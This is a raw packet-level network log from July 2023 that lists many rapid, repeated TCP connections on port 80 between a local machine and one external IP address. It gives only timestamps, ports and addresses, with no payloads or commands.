Jul 27, 2023 01:33:19.452768087 CEST	80	49777	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:19.456782103 CEST	80	49777	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:19.456917048 CEST	49777	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.782078981 CEST	49777	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.782943964 CEST	49778	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.828320026 CEST	80	49777	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:19.828356028 CEST	80	49778	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:19.828434944 CEST	49777	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.828500986 CEST	49778	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.851775885 CEST	49778	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.896157026 CEST	80	49778	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:19.900024891 CEST	80	49778	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:19.900127888 CEST	49778	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.171298027 CEST	49778	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.215858936 CEST	80	49778	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.216001987 CEST	49778	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.239315987 CEST	49779	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.283298016 CEST	80	49779	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.283407927 CEST	49779	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.297333956 CEST	49779	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.341386080 CEST	80	49779	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.345674038 CEST	80	49779	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.345808029 CEST	49779	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.463176012 CEST	49779	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.464009047 CEST	49780	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.507539988 CEST	80	49779	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.507632971 CEST	49779	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.507920980 CEST	80	49780	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.508013964 CEST	49780	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.509303093 CEST	49780	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.553353071 CEST	80	49780	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.557251930 CEST	80	49780	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.557337046 CEST	49780	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.671502113 CEST	49780	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.672418118 CEST	49781	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.715564966 CEST	80	49780	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.715656042 CEST	49780	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.717319012 CEST	80	49781	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.717575073 CEST	49781	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.723074913 CEST	49781	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.767965078 CEST	80	49781	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.773479939 CEST	80	49781	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.773633003 CEST	49781	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.891097069 CEST	49781	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.892179012 CEST	49782	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.936748981 CEST	80	49781	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.936873913 CEST	49781	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.937906981 CEST	80	49782	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.938035965 CEST	49782	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.938381910 CEST	49782	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:20.982956886 CEST	80	49782	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.986718893 CEST	80	49782	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:20.986810923 CEST	49782	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.128838062 CEST	49782	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.140280962 CEST	49783	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.173784971 CEST	80	49782	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.173896074 CEST	49782	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.184279919 CEST	80	49783	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.184441090 CEST	49783	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.187625885 CEST	49783	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.231708050 CEST	80	49783	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.235827923 CEST	80	49783	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.235949039 CEST	49783	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.351041079 CEST	49783	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.351807117 CEST	49784	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.395095110 CEST	80	49783	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.395185947 CEST	49783	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.395665884 CEST	80	49784	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.395757914 CEST	49784	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.396688938 CEST	49784	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.440589905 CEST	80	49784	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.445514917 CEST	80	49784	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.446687937 CEST	49784	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.601280928 CEST	49784	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.601995945 CEST	49785	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.645365953 CEST	80	49784	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.646595001 CEST	80	49785	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.646683931 CEST	49784	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.646724939 CEST	49785	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.647870064 CEST	49785	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.692553997 CEST	80	49785	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.696491003 CEST	80	49785	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.698733091 CEST	49785	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.822698116 CEST	49785	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.825207949 CEST	49786	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.867455006 CEST	80	49785	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.867528915 CEST	49785	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.869923115 CEST	80	49786	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.870057106 CEST	49786	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.876204014 CEST	49786	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:21.920888901 CEST	80	49786	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.925638914 CEST	80	49786	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:21.926270008 CEST	49786	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.061799049 CEST	49786	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.062783957 CEST	49787	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.106683016 CEST	80	49786	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.107111931 CEST	80	49787	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.107253075 CEST	49786	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.107285023 CEST	49787	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.107824087 CEST	49787	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.152038097 CEST	80	49787	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.155992031 CEST	80	49787	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.158338070 CEST	49787	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.283221006 CEST	49787	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.284293890 CEST	49788	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.327707052 CEST	80	49787	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.327819109 CEST	49787	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.328480959 CEST	80	49788	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.328612089 CEST	49788	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.334162951 CEST	49788	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.378699064 CEST	80	49788	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.382637978 CEST	80	49788	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.384294033 CEST	49788	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.522778034 CEST	49788	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.523504019 CEST	49789	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.568079948 CEST	80	49788	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.568151951 CEST	49788	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.569194078 CEST	80	49789	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.569283962 CEST	49789	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.573383093 CEST	49789	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.618244886 CEST	80	49789	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.622298002 CEST	80	49789	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.622452021 CEST	49789	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.750988960 CEST	49789	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.751646042 CEST	49790	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.795702934 CEST	80	49790	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.795799017 CEST	49790	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.795875072 CEST	80	49789	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.795965910 CEST	49789	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.797924042 CEST	49790	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.842071056 CEST	80	49790	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.846404076 CEST	80	49790	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:22.846513033 CEST	49790	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.986071110 CEST	49790	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:22.986680031 CEST	49791	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.030495882 CEST	80	49790	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.030589104 CEST	80	49791	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.030724049 CEST	49790	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.030730963 CEST	49791	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.031143904 CEST	49791	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.075242996 CEST	80	49791	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.078851938 CEST	80	49791	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.079447985 CEST	49791	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.189656019 CEST	49791	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.200963974 CEST	49792	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.233931065 CEST	80	49791	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.234055042 CEST	49791	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.245388031 CEST	80	49792	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.245604038 CEST	49792	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.265599012 CEST	49792	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.310159922 CEST	80	49792	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.313203096 CEST	80	49792	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.313282967 CEST	49792	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.548104048 CEST	49792	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.592860937 CEST	80	49792	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.593089104 CEST	49792	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.610769033 CEST	49793	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.655397892 CEST	80	49793	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.655698061 CEST	49793	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.687297106 CEST	49793	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.731889963 CEST	80	49793	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.734842062 CEST	80	49793	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.734981060 CEST	49793	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.848718882 CEST	49793	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.849632025 CEST	49794	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.893878937 CEST	80	49793	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.893913031 CEST	80	49794	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.894005060 CEST	49793	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.894052982 CEST	49794	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.895977020 CEST	49794	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:23.940470934 CEST	80	49794	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.943553925 CEST	80	49794	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:23.943643093 CEST	49794	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.062174082 CEST	49794	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.063107014 CEST	49795	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.107913971 CEST	80	49795	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.107935905 CEST	80	49794	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.108114958 CEST	49794	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.108452082 CEST	49795	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.115695953 CEST	49795	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.160509109 CEST	80	49795	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.164967060 CEST	80	49795	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.165128946 CEST	49795	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.309058905 CEST	49795	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.309999943 CEST	49796	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.354058981 CEST	80	49795	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.354099989 CEST	80	49796	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.354249001 CEST	49795	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.354312897 CEST	49796	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.354832888 CEST	49796	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.399030924 CEST	80	49796	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.404314041 CEST	80	49796	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.404484987 CEST	49796	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.529436111 CEST	49796	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.531162024 CEST	49797	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.573740005 CEST	80	49796	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.573885918 CEST	49796	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.576051950 CEST	80	49797	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.579062939 CEST	49797	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.601993084 CEST	49797	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.646846056 CEST	80	49797	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.651132107 CEST	80	49797	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.651945114 CEST	49797	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.770070076 CEST	49798	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.770153999 CEST	49797	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.814177990 CEST	80	49798	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.814909935 CEST	80	49797	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.815047026 CEST	49797	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.815340996 CEST	49798	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.815500975 CEST	49798	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.860797882 CEST	80	49798	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.864037991 CEST	80	49798	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:24.864209890 CEST	49798	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.997766972 CEST	49798	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:24.998609066 CEST	49799	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.042098045 CEST	80	49798	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.042218924 CEST	49798	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.043102026 CEST	80	49799	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.043200970 CEST	49799	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.043926001 CEST	49799	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.089472055 CEST	80	49799	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.092775106 CEST	80	49799	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.092890024 CEST	49799	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.202712059 CEST	49799	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.203547955 CEST	49800	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.247126102 CEST	80	49799	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.247450113 CEST	49799	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.247827053 CEST	80	49800	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.247991085 CEST	49800	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.252545118 CEST	49800	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.297012091 CEST	80	49800	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.300736904 CEST	80	49800	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.300820112 CEST	49800	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.406672955 CEST	49800	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.418601990 CEST	49801	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.451039076 CEST	80	49800	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.451632023 CEST	49800	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.462706089 CEST	80	49801	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.463073015 CEST	49801	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.463910103 CEST	49801	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.507863045 CEST	80	49801	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.512491941 CEST	80	49801	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.512624979 CEST	49801	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.624958992 CEST	49801	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.638711929 CEST	49802	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.669161081 CEST	80	49801	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.669305086 CEST	49801	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.683182001 CEST	80	49802	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.683306932 CEST	49802	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.684921980 CEST	49802	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.729259968 CEST	80	49802	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.733177900 CEST	80	49802	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.733594894 CEST	49802	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.846080065 CEST	49802	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.846107006 CEST	49803	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.890553951 CEST	80	49803	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.890594959 CEST	80	49802	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.891439915 CEST	49802	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.891444921 CEST	49803	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.896753073 CEST	49803	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:25.941127062 CEST	80	49803	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.945580006 CEST	80	49803	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:25.945694923 CEST	49803	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.063546896 CEST	49803	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.064197063 CEST	49804	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.107920885 CEST	80	49803	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.108048916 CEST	49803	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.108484983 CEST	80	49804	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.108593941 CEST	49804	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.111612082 CEST	49804	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.155987978 CEST	80	49804	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.161134958 CEST	80	49804	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.162384033 CEST	49804	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.311400890 CEST	49804	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.312808990 CEST	49805	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.356071949 CEST	80	49804	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.357136965 CEST	80	49805	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.357238054 CEST	49804	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.357264042 CEST	49805	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.357636929 CEST	49805	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.402064085 CEST	80	49805	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.407182932 CEST	80	49805	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.410599947 CEST	49805	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.532484055 CEST	49805	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.533288956 CEST	49806	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.577023029 CEST	80	49805	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.577367067 CEST	49805	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.577635050 CEST	80	49806	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.581522942 CEST	49806	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.584492922 CEST	49806	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.628885984 CEST	80	49806	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.633224010 CEST	80	49806	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.634690046 CEST	49806	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.772706032 CEST	49806	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.774519920 CEST	49807	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.818784952 CEST	80	49806	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.820877075 CEST	80	49807	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.821006060 CEST	49806	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.821062088 CEST	49807	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.828284979 CEST	49807	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.873133898 CEST	80	49807	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.878165007 CEST	80	49807	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:26.878669024 CEST	49807	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.984313011 CEST	49807	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:26.984920025 CEST	49808	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.029223919 CEST	80	49807	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.029270887 CEST	80	49808	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.029367924 CEST	49807	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.029421091 CEST	49808	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.029954910 CEST	49808	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.074378014 CEST	80	49808	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.079129934 CEST	80	49808	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.079541922 CEST	49808	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.191137075 CEST	49808	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.192106009 CEST	49809	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.235687971 CEST	80	49808	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.235775948 CEST	49808	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.236823082 CEST	80	49809	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.236959934 CEST	49809	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.238121033 CEST	49809	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.284394026 CEST	80	49809	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.286492109 CEST	80	49809	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.290720940 CEST	49809	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.419723034 CEST	49809	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.432254076 CEST	49810	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.464564085 CEST	80	49809	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.464647055 CEST	49809	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.476963043 CEST	80	49810	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.477047920 CEST	49810	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.477612019 CEST	49810	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:27.522232056 CEST	80	49810	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.525614977 CEST	80	49810	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:27.525680065 CEST	49810	80	192.168.2.5	77.91.68.61
